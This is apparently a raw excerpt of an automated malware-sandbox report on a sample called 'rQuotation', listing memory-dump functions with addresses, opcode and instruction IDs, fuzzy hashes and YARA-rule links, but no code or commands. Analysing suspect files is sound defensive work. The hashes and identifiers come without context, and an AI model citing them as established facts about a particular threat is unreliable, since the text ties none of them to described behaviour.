                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: EXT-
                                                                                                                                                                                                                                                • API String ID: 0-1948896318
                                                                                                                                                                                                                                                • Opcode ID: 44b066e7d4766a2c83c0f869543c3e421bb6dbd1bedd9d858e687c91f85c554e
                                                                                                                                                                                                                                                • Instruction ID: 3a61b25878eed8ffb547003b2ccc76b188806aeb3e8d96a90a49e89487299614
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44b066e7d4766a2c83c0f869543c3e421bb6dbd1bedd9d858e687c91f85c554e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC41C072D08312ABD711DB75CC80B6BB7E8AF88B14F45092DF684DB280E775D904C796
                                                                                                                                                                                                                                                Function 0173C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: BinaryHash
                                                                                                                                                                                                                                                • API String ID: 0-2202222882
                                                                                                                                                                                                                                                • Opcode ID: 8da792de9c09b2efc270d804db69e67929e644e832ea92c015b4868280d4442d
                                                                                                                                                                                                                                                • Instruction ID: 2e5983eb8218daf7e8ff35c401258382b5a3318056a6fddd9544a0d9b73388ee
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8da792de9c09b2efc270d804db69e67929e644e832ea92c015b4868280d4442d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B4154B2D0022DAADB22DA50CC84FDEF77CAB44714F0045A6AB08BB141DB709E898F94
                                                                                                                                                                                                                                                Function 01756B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: #
                                                                                                                                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                                                                                                                                • Opcode ID: 01ffd6702fd03966a599835d6f8183a5cae4e0e9dad18d4f57c2b3d5b698eeb1
                                                                                                                                                                                                                                                • Instruction ID: f60bf57d1358b4347bcdc3e051e908cf669474ebdbdd02f5ea988b546d5d2102
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01ffd6702fd03966a599835d6f8183a5cae4e0e9dad18d4f57c2b3d5b698eeb1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0312631E007099BEB22DB69C854FAEFBB9DF54704F944068FE41AB282C7B5E805CB50
                                                                                                                                                                                                                                                Function 0173CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: BinaryName
                                                                                                                                                                                                                                                • API String ID: 0-215506332
                                                                                                                                                                                                                                                • Opcode ID: 97cba9dd930bde2f39720027f940d520d97ad898975639f90f24f19ebf68cf33
                                                                                                                                                                                                                                                • Instruction ID: c2b98155dd4a70e1b2d68ffd87f13848032e8487ded86f486d903a278600ba2c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97cba9dd930bde2f39720027f940d520d97ad898975639f90f24f19ebf68cf33
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7310576900519AFEB1BDB59C845E6FFB74EBC0710F01416AA901B7252D7309E00EBE0
                                                                                                                                                                                                                                                Function 0174892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0174895E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                                                                • API String ID: 0-702105204
                                                                                                                                                                                                                                                • Opcode ID: 3530451a2a1481b7e26da6a6ceb5c02237ff18d417c585c78a55fac6cd6d6290
                                                                                                                                                                                                                                                • Instruction ID: 18dcc84dce3d14319c7895b3e4828a8b838d7f8e3a50b84d4b21efe1fd34e1d4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3530451a2a1481b7e26da6a6ceb5c02237ff18d417c585c78a55fac6cd6d6290
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6012BB5205A099FE7256F99CCC4FA7FF65EF86664B08042CF78116151CB316C41C797
                                                                                                                                                                                                                                                Function 016FE8F0 Relevance: 1.0, Instructions: 985COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 464e54a7dfc4f5e0653dd2c84447f464a43cc8cfd442eb802ab1ab94d1f08335
                                                                                                                                                                                                                                                • Instruction ID: 7c48eb865e4cc928353df4b744cabbe7da112b0048ba419400a4ed4e6d9f1520
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 464e54a7dfc4f5e0653dd2c84447f464a43cc8cfd442eb802ab1ab94d1f08335
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44821372F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
                                                                                                                                                                                                                                                Function 0170516C Relevance: .8, Instructions: 785COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: effe2052e5090bea4e814dca19260a7b7d3baf0efc589f2eb6c91389d1d9ae2e
                                                                                                                                                                                                                                                • Instruction ID: 0100d13fdad6f73be175971f6c58ff5eba82f009c052009b589e95bd0c652bfa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: effe2052e5090bea4e814dca19260a7b7d3baf0efc589f2eb6c91389d1d9ae2e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48629E7290874AEFCF27CF08D4904AEFBA2BE55314B49C698C89A67745D371BA44CF90
                                                                                                                                                                                                                                                Function 01762000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 10affff3718f9cbb0e1b3794e900101f4e5dc525f06e876634f027363377b83f
                                                                                                                                                                                                                                                • Instruction ID: 2ae98420c2bfd449cf4583b7b1b29776e5dc60867c5b7dc17c3b1c8d0a12e5de
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10affff3718f9cbb0e1b3794e900101f4e5dc525f06e876634f027363377b83f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E742D3716083429FD7A5CF68C890A6BFBE9BF88340F08492DFE8297252D775D845CB52
                                                                                                                                                                                                                                                Function 0171739A Relevance: .7, Instructions: 705COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e1488d3b517d0d57d35629c2914bd4f568c402e2fe48378379a55f1216e23cf2
                                                                                                                                                                                                                                                • Instruction ID: 7cadbca17948204c66b1c82f10f2a1365438df4ba7e8ee28504b02185129682c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1488d3b517d0d57d35629c2914bd4f568c402e2fe48378379a55f1216e23cf2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F442B271A006168FDB19CF5DC890ABEFBB2FF88314B24855DD952AB349D734E942CB90
                                                                                                                                                                                                                                                Function 016EB2C0 Relevance: .6, Instructions: 629COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1c2cf1a7803a6c4a251d6080cc773d35ff5055c35033fb2ed6c061f2ef7c82fb
                                                                                                                                                                                                                                                • Instruction ID: b70d366e00c8dd1739633bb60050b426a383de7420708318b35c8cca8ef8772b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c2cf1a7803a6c4a251d6080cc773d35ff5055c35033fb2ed6c061f2ef7c82fb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3329C72E02219DBDB24DF98DC98BAEBBF1FF54714F180129E905AB391E7359901CB90
                                                                                                                                                                                                                                                Function 01758158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3b09db30762cec70cab17d3d8aec4ab7c5e89ca4378aafad37a137cfdd7e7107
                                                                                                                                                                                                                                                • Instruction ID: 3d300dab1c0911269c148ec7ef37dfba5260c74360a681005f2cf718653f2c48
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b09db30762cec70cab17d3d8aec4ab7c5e89ca4378aafad37a137cfdd7e7107
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB425B71E102198FEB65CF69C881BADFBF6BF48300F188199E949AB242D7749981CF51
                                                                                                                                                                                                                                                Function 016D2840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: af7e0c42bc2e1472dec19d50e2a53dcade6006bce47a5eb42927f2114ae22dd9
                                                                                                                                                                                                                                                • Instruction ID: d4e25ed09aad84a290ef4b6865f4a7f0e79c18d4aec0db7b691287f0a0f64e81
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af7e0c42bc2e1472dec19d50e2a53dcade6006bce47a5eb42927f2114ae22dd9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A32F070A007658FDB25CF69C854BBEFBF2BF84704F24411EE9869B285DB75A842CB50
                                                                                                                                                                                                                                                Function 0176A118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ea7f1f9179ba244e6af30c164ba754ff6956814ee3f157f1efdf879aaaa7313a
                                                                                                                                                                                                                                                • Instruction ID: 681c9de02a68f69303db9911c09add638f30a83b9f24fcd2010ead8b563184aa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea7f1f9179ba244e6af30c164ba754ff6956814ee3f157f1efdf879aaaa7313a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2522D2702046618FEB25CF2DC494772FBF9AF45300F18849AED96AF286D735E852DB60
                                                                                                                                                                                                                                                Function 017816CC Relevance: .6, Instructions: 571COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8a27c6a32bdcfe320e8924a78f6d02d2b6d94f9f18705758245c5f091cc8d70a
                                                                                                                                                                                                                                                • Instruction ID: 5cf0606bb1f62c22dc57188b7dd63872d0d589824e3001f5ca6710f1e73afd10
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a27c6a32bdcfe320e8924a78f6d02d2b6d94f9f18705758245c5f091cc8d70a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4722DF35B402168FDB19DF58C490ABAF7F2BF88314B68816DD956DB345EB30E942CB90
                                                                                                                                                                                                                                                Function 016E8DBF Relevance: .6, Instructions: 554COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b737fa825416cb9bf1898362e60cca9fe9fde9a94659fd0f97f3026a04e925fe
                                                                                                                                                                                                                                                • Instruction ID: 910b7ce313cbc1f70c181a7ebc6f67348c9160f4c2c7a7e5d01683fd28fd16c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b737fa825416cb9bf1898362e60cca9fe9fde9a94659fd0f97f3026a04e925fe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94226270E04226DBCB25CF99C8849BEFBF6BF44314B54815AE9459B241E734DD82CBA4
                                                                                                                                                                                                                                                Function 016C6A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fbe73c88e003b7ec4bcee0b1ef757a77bcdae1e05cc6a3d7af506aa345a91bda
                                                                                                                                                                                                                                                • Instruction ID: 806b5f16b8dd1f4104abe5c285f1de0b3b148c8ae06a95701033ffd8419233dd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbe73c88e003b7ec4bcee0b1ef757a77bcdae1e05cc6a3d7af506aa345a91bda
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25328F71A05215CFDB25CF68C880BAAB7F2FF48710F14856DE955AB352D734E842CB94
                                                                                                                                                                                                                                                Function 01782446 Relevance: .5, Instructions: 485COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6b156a41bb81dae56cc4d8826878deb3293a790263087d86e5794ebfbe357b14
                                                                                                                                                                                                                                                • Instruction ID: d1cc49cfefe030d4b5ebb6f54ea55dc835edc81b0737040c5f75dabf7714ea25
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b156a41bb81dae56cc4d8826878deb3293a790263087d86e5794ebfbe357b14
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F602EF746846518FEB64EF2EC450275FBF1AF84302B1981DAE9D6DB283D734E842DB60
                                                                                                                                                                                                                                                Function 01715630 Relevance: .5, Instructions: 458COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                                                                                                                                                                                                • Instruction ID: ffb0d5ffaedd461392ff03f0fc5286a20521a18151f0aafea998c91714caa2ef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 743c94b24dba1edfdbdbc7f9e1d66971d251120f723e29e2eaeff24ce68898bf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDD14573B6471C4FC384DE6EDC82381B2D2ABD4528B5D843C9D18CB303F669E91E6688
                                                                                                                                                                                                                                                Function 017841A2 Relevance: .5, Instructions: 452COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 45ee07fd45c83df0957bc453064e3cfb96671a7fe123afc67ac91670f4706826
                                                                                                                                                                                                                                                • Instruction ID: 495b990ad6cb150e94d60b84a689d239cfe65aff195348b711e7710ceb7214a0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45ee07fd45c83df0957bc453064e3cfb96671a7fe123afc67ac91670f4706826
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15029E71E4021ACFCB15DF98C4807ADFBB2FF88314F298169D556AB746E770A942CB50
                                                                                                                                                                                                                                                Function 0179B16B Relevance: .4, Instructions: 450COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 32b761caa17f67ac4111ca8fd5593e6b0d6c7caf678caddc0d8bf02149629791
                                                                                                                                                                                                                                                • Instruction ID: 6b079a624ffb48a2cc2f9200a8b98a0b4766124883dfd19ebde9d5ec5773583c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32b761caa17f67ac4111ca8fd5593e6b0d6c7caf678caddc0d8bf02149629791
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32F10672E006158BCF18CFADE990A7EFBF6EF8821071941ADD856DB381E634E904CB50
                                                                                                                                                                                                                                                Function 00850523 Relevance: .4, Instructions: 435COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                                                                                                                • Instruction ID: 1229d2bcd7831d6ed88b754a39ec76b58ca03dc22c3b4416d90d89c36f4870b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A026F73E547164FE720DE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                                                                                                                                                                                                                                                Function 0179A9A6 Relevance: .4, Instructions: 425COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d904f9ba7a0671a160ce4e8ec813e0fc26b2173a1e68654d45409003f11bc70d
                                                                                                                                                                                                                                                • Instruction ID: 70fe9d396b607ad95194d88bd2ed539595059dd56f5b23697292cb6121cb8fa8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d904f9ba7a0671a160ce4e8ec813e0fc26b2173a1e68654d45409003f11bc70d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CF1D172E015269BCF18CEA8D9A05BDFBF1EF59210B19426DD856EB380D734EE44CB80
                                                                                                                                                                                                                                                Function 016E4A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                                                                • Instruction ID: 2e4e24ecab0a422d08a47ab6e8e10c73457ed6bb4affd664fc162730b8aee54d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CF16271E0121A9BDF15CFA9C998BAEFBF5AF44710F048269E905EB344EB74D842CB50
                                                                                                                                                                                                                                                Function 01772F30 Relevance: .4, Instructions: 412COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 141eabe82e83f5207bf97e51283e8c324d8c4922d62b3f44c6bf289ee4d11ad4
                                                                                                                                                                                                                                                • Instruction ID: 87bf1618b0c0b427347a7e5eba6fbe36a3f94d8046106018d186dcf8836a4c5a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 141eabe82e83f5207bf97e51283e8c324d8c4922d62b3f44c6bf289ee4d11ad4
